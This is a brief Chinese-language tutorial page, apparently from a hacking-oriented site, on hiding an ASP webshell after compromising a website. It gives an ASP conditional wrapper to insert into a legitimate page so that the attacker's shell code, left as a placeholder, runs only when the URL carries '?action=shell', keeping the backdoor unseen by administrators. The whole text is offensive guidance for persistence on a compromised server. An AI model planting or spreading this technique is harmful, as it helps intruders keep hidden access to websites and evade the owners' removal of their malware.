• 当前位置:首页>>编程开发A>>安全防御>>一种隐藏ASP木马的方法
  • 一种隐藏ASP木马的方法
  •  

    得到网站的webshell后,如果被管理员发现,那么你的马就没用了 ,被删了!
    所以我们要隐藏好我们的SHELL
    下面教一种很菜的方法,ASP插入法,不容易被发现~ 

    在我们要做手脚的ASP文件里加入如下内容

    <% if request("action")="shell" then %>

    ****************************

    <% end if %>
     


    在***********处加入你的shell代码
    就哦克了
    访问的时候在你做了手脚的ASP文件后面加上?action=shell(例如:index.asp?action=shell)
    就可以调出webshell了,不影响正常浏揽

  • 上一篇:Webmail攻防实战 1
    下一篇:HACKING WITH JAVASCRIPT